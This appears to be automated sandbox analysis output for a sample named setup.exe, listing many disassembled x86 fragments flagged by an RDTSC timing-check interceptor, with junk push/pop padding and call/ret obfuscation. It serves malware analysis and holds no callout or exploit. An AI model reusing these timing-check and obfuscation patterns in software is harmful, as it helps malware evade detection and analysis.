Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E6877 second address: 5E6883 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E6883 second address: 5E688A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E7485 second address: 5E748B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E748B second address: 5E748F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E748F second address: 5E7516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2F04h], edx 0x00000011 movsx esi, bx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FC169461A98h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D2A73h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007FC169461A98h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 jmp 00007FC169461A9Bh 0x00000057 xchg eax, ebx 0x00000058 pushad 0x00000059 push ecx 0x0000005a jmp 00007FC169461AA2h 0x0000005f pop ecx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 pop eax 0x00000064 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5E7DBF second address: 5E7DDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FC16945A278h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5ECF49 second address: 5ECF4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F0A26 second address: 5F0A30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC16945A276h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F0B73 second address: 5F0B79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F1B5A second address: 5F1B5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F0B79 second address: 5F0B7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F1C22 second address: 5F1C28 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F2CA5 second address: 5F2CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F2CAE second address: 5F2CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F3CA7 second address: 5F3CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F4C8C second address: 5F4CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 nop 0x00000006 clc 0x00000007 push dword ptr fs:[00000000h] 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FC16945A278h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 cld 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007FC16945A278h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a mov eax, dword ptr [ebp+122D0775h] 0x00000050 mov dword ptr [ebp+122D2610h], esi 0x00000056 push FFFFFFFFh 0x00000058 mov ebx, dword ptr [ebp+122D2C7Bh] 0x0000005e nop 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push esi 0x00000064 pop esi 0x00000065 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F59F6 second address: 5F59FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F4CFE second address: 5F4D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F59FF second address: 5F5A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F5A03 second address: 5F5A8B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FC16945A285h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FC16945A278h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c jnc 00007FC16945A27Ch 0x00000032 push edi 0x00000033 mov di, D5E1h 0x00000037 pop ebx 0x00000038 push 00000000h 0x0000003a movzx ebx, si 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007FC16945A278h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 0000001Dh 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 xchg eax, esi 0x0000005a pushad 0x0000005b push ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F6AAB second address: 5F6AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA1h 0x00000009 popad 0x0000000a push ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007FC169461A96h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F8ADD second address: 5F8AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5ACE35 second address: 5ACE4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007FC169461A96h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F6C93 second address: 5F6D21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC16945A27Ch 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007FC16945A278h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a mov ebx, dword ptr [ebp+122D2ACBh] 0x00000030 push dword ptr fs:[00000000h] 0x00000037 pushad 0x00000038 jmp 00007FC16945A27Ch 0x0000003d add ebx, dword ptr [ebp+122D5B92h] 0x00000043 popad 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b mov ebx, dword ptr [ebp+122D2967h] 0x00000051 mov di, si 0x00000054 mov eax, dword ptr [ebp+122D0B71h] 0x0000005a sbb edi, 58034AD8h 0x00000060 push FFFFFFFFh 0x00000062 mov dword ptr [ebp+124587CDh], ebx 0x00000068 mov bh, E5h 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f push ecx 0x00000070 pop ecx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F6D21 second address: 5F6D27 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5ACE4A second address: 5ACE4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F6D27 second address: 5F6D2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5ACE4F second address: 5ACE5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC16945A276h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5ACE5B second address: 5ACE66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5FA004 second address: 5FA00A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5FA00A second address: 5FA02D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC169461A98h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC169461AA4h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5F93B3 second address: 5F93B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5FB27D second address: 5FB283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5FC25C second address: 5FC260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5FC260 second address: 5FC26E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FC169461A9Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5FF2DA second address: 5FF2DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6020C4 second address: 6020CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6020CA second address: 6020DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 jng 00007FC16945A282h 0x0000000c jns 00007FC16945A276h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 600207 second address: 60020B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6002D7 second address: 6002E8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC16945A276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6002E8 second address: 6002FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461A9Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 609474 second address: 609496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jo 00007FC16945A287h 0x00000011 jmp 00007FC16945A27Fh 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5AE86E second address: 5AE878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5AE878 second address: 5AE89A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A281h 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FC16945A276h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5AE89A second address: 5AE8A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5AE8A6 second address: 5AE8B0 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC16945A276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5AE8B0 second address: 5AE8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007FC169461A96h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC169461AA3h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 608F6A second address: 608F87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A283h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 608F87 second address: 608F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 608F8C second address: 608F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 608F92 second address: 608FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 608FA1 second address: 608FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 608FA5 second address: 608FB1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC169461A96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 608FB1 second address: 608FB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 608FB7 second address: 608FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461AA5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 60AA3C second address: 60AA52 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC16945A276h 0x00000008 jns 00007FC16945A276h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 60AA52 second address: 60AA63 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jo 00007FC169461A96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 60AA63 second address: 60AA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A27Ah 0x00000009 popad 0x0000000a popad 0x0000000b jc 00007FC16945A29Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 60AA7D second address: 60AA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5A62D7 second address: 5A62DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5A62DB second address: 5A62FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC169461AA5h 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5A62FB second address: 5A6307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5A6307 second address: 5A6311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC169461A96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5A6311 second address: 5A631D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC16945A276h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5A631D second address: 5A6329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007FC169461A96h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 610FF1 second address: 610FF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 610FF5 second address: 611000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 611000 second address: 611006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 611006 second address: 61100D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61100D second address: 611015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 615CFA second address: 615D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC169461A9Ch 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FC169461A9Eh 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 615D18 second address: 615D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 615D20 second address: 615D25 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 614F3B second address: 614F68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A287h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FC16945A276h 0x0000000f jmp 00007FC16945A27Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 614F68 second address: 614FAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jmp 00007FC169461AA8h 0x00000013 jnc 00007FC169461A96h 0x00000019 pop edi 0x0000001a jmp 00007FC169461AA2h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 614FAE second address: 614FB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 614FB4 second address: 614FBE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 614FBE second address: 614FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 615130 second address: 61513B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61513B second address: 615150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC16945A27Ah 0x00000009 jc 00007FC16945A276h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 615426 second address: 61542A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6155AF second address: 6155B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6159F9 second address: 6159FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 6159FF second address: 615A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FC16945A27Eh 0x0000000b pushad 0x0000000c jmp 00007FC16945A27Ah 0x00000011 push esi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 617282 second address: 61728D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61728D second address: 617291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 61FB56 second address: 61FB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
